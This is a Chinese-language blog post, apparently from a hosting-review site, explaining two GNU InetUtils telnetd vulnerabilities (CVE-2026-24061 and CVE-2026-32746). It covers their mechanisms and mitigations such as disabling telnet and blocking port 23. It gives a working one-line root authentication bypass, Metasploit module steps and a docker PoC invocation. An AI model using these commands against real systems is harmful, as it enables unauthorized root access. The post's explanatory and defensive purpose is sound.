欢迎光临
我们一直在努力

Telnetd零认证提取漏洞 and RCE

一、Telnetd零认证提取漏洞 CVE-2026-24061

在这里插入图片描述

1. 漏洞介绍

CVE-2026-24061是存在于GNU InetUtils telnetd服务中的远程参数注入型认证绕过漏洞,核心问题在于telnetd服务对客户端传入的USER环境变量缺乏任何过滤和校验,直接将其作为命令行参数传递给系统登录程序/usr/bin/login,进而被攻击者利用实现身份绕过。

2. 漏洞核心:未过滤的USER环境变量与login的-f参数“漏洞”

该漏洞的本质是telnetd的代码设计中缺乏对USER环境变量的输入校验,且恰好利用了/usr/bin/login程序的-f参数特性,形成“组合式漏洞”。(/usr/bin/login是类Unix系统的原生登录程序;-f参数是为系统管理员设计的预认证快捷功能,能跳过密码输入直接登录指定用户。)
当login程序接收到-f [用户名]参数时,会判定为“已完成预认证”,直接跳过密码校验步骤,以指定用户的身份启动shell会话,前提是该参数仅能由本地高权限进程传递,且对参数来源做严格校验。

3. POC

(1)攻击者注入后的login命令:USER=’ -f root’ telnet -a [目标IP] [Telnet端口,默认23],/usr/bin/login -p -h [攻击者IP] -f root
login程序收到-f root参数后,直接跳过密码校验,以root超级用户身份为攻击者分配shell会话–整个过程无需攻击者数据任何账号密码。
(2)MSF
msfconsole
use exploit/unix/telnet/gnu_telnetd_cve202624061
set RHOSTS 目标IP
set RPORT 23
run
执行成功后直接获取root shell

二、Telnetd使未认证的根RCE成为可能 CVE-2026-32746

在这里插入图片描述

1. 触发原理及危害

  • 未经认证的远程攻击者可以通过在初始连接握手时发送特别设计的消息–在任何登录提示出现之前。
  • 成功的利用可能导致代码以root身份远程执行。
  • 只需一次网络连接到23端口,就足以触发漏洞。无需凭证,无需用户互动,也无需特殊网络职位,无需登录。
  • 2. POC

    左边是攻击机,直接输入docker run -it –rm -p 2324:2323 –privileges poc-v001-telnetd-slc bash,无需任何其他操作,在初始连接握手时就发送了poc,拿下了root权限的shell。
    在这里插入图片描述

    3. 剖析

  • 原理:SLC处理器在Telnet协议握手过程中处理选项谈判,但鉴于该漏洞可能在认证前被触发,攻击者可以在建立连接后立即通过发送专门设计的协议消息将其武器化,未经认证的攻击者可以通过连接端口23并发送一个带有多个三元组的精心设计的SLC选项来触发它。
  • 如果telnetd以根权限运行,成功的利用可能导致系统全面攻破,这反过来可能为各种被利用后的行动打开大门,包括部署持久后门,数据外泄以及利用被攻破主机作为枢纽的横向移动。
  • “不需要登录;该漏洞是在选项谈判过程中出现的,也就是在登录提示之前。溢出会破坏内存,并可能被转换为任意写入。实际上,这可能导致远程代码执行。由于telnetd通常以root身份运行,成功的利用将使攻击者完全控制系统”
  • 4. 修复方法

    如果没有修复方法,建议如果不必要就禁用该服务,必要时无root权限运行telnetd,在网络边界和主机防火墙层封锁23端口以限制访问,并隔离Telnet访问。

    三、总结

    Telnetd这两个漏洞爆出来时,还是震惊了很多人,只需要输入一行命令,就可以拿到root权限并且进行RCE,神不知鬼不觉的拿下对方的shell。
    这是我今天的漏洞分享,我每天都是会分享安全时事,以及新的漏洞,大家一起加油。
    在这里插入图片描述

    赞(0)
    未经允许不得转载:171主机测评 » Telnetd零认证提取漏洞 and RCE
    分享到: 更多 (0)

    评论 抢沙发

    • 昵称 (必填)
    • 邮箱 (必填)
    • 网址